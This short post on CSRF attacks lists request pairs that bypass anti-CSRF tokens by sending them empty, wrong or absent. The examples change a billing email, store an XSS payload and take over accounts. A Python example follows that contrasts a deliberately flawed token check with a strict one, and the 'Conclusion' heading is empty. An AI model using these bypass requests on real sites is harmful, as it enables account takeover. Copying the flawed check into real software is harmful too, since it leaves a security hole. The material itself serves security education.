Attacking Sites Using CSRF

Critical CSRF #1: Leaking user information using CSRF

POST /change_billing_email
REQUEST BODY:
email=NEW_EMAIL &csrftok=12345

POST /change_billing_email
REQUEST BODY:
email=ATTACKER_EMAIL &csrftok=

Critical CSRF #2: Stored Self-XSS using CSRF

POST /change_account_nickname
REQUEST BODY:
nickname=<XSS PAYLOAD> &csrftok=WRONG_TOKEN

POST /change_account_nickname
REQUEST BODY:
nickname=<XSS PAYLOAD>

Critical CSRF #3: Taking over user accounts using CSRF

POST /password_change
REQUEST BODY:
oldpassword= &newpassword=XXXXX &csrftok=12345

POST /password_change
REQUEST BODY:
oldpassword= &newpassword=ATTACKER_PASS &csrftok=
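
The request pairs above differ only in the csrftok parameter: a real value, an empty value, a wrong value, or no parameter at all. The following is an added example, not code from the original post or from any site it discusses. It contrasts a validator that skips the comparison when the token is empty or absent (an assumed flaw, written here for contrast) with one that rejects all of those shapes. The function names, the session dictionary and the sample bodies are constructed for illustration.

```python
import hmac
import secrets
from urllib.parse import parse_qs


def issue_token(session: dict) -> str:
    """Bind a fresh random token to the server-side session."""
    session["csrftok"] = secrets.token_urlsafe(32)
    return session["csrftok"]


def lenient_check(session: dict, body: str) -> bool:
    """Assumed flawed pattern: compares only when a non-empty token is sent."""
    form = parse_qs(body, keep_blank_values=True)
    submitted = form.get("csrftok", [""])[0]
    if not submitted:  # empty or absent token: validation is skipped
        return True
    return submitted == session.get("csrftok")


def strict_check(session: dict, body: str) -> bool:
    """Reject absent, empty, duplicated and mismatched tokens."""
    form = parse_qs(body, keep_blank_values=True)
    values = form.get("csrftok", [])
    expected = session.get("csrftok", "")
    if len(values) != 1 or not values[0] or not expected:
        return False
    # Constant-time comparison of the submitted and session-bound tokens.
    return hmac.compare_digest(values[0].encode(), expected.encode())


def sample_bodies(valid_token: str) -> dict:
    """Constructed request bodies mirroring the four shapes shown above."""
    return {
        "valid": f"email=NEW_EMAIL&csrftok={valid_token}",
        "empty": "email=ATTACKER_EMAIL&csrftok=",
        "wrong": "nickname=x&csrftok=WRONG_TOKEN",
        "absent": "nickname=x",
    }


def evaluate(check) -> dict:
    """Run one validator over every sample body for a fresh session."""
    session = {}
    token = issue_token(session)
    return {name: check(session, body)
            for name, body in sample_bodies(token).items()}


if __name__ == "__main__":
    print("lenient:", evaluate(lenient_check))
    print("strict: ", evaluate(strict_check))
```

The strict validator fails closed: a state-changing request is accepted only when exactly one non-empty token is present and it matches the token stored for that session.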

Conclusion
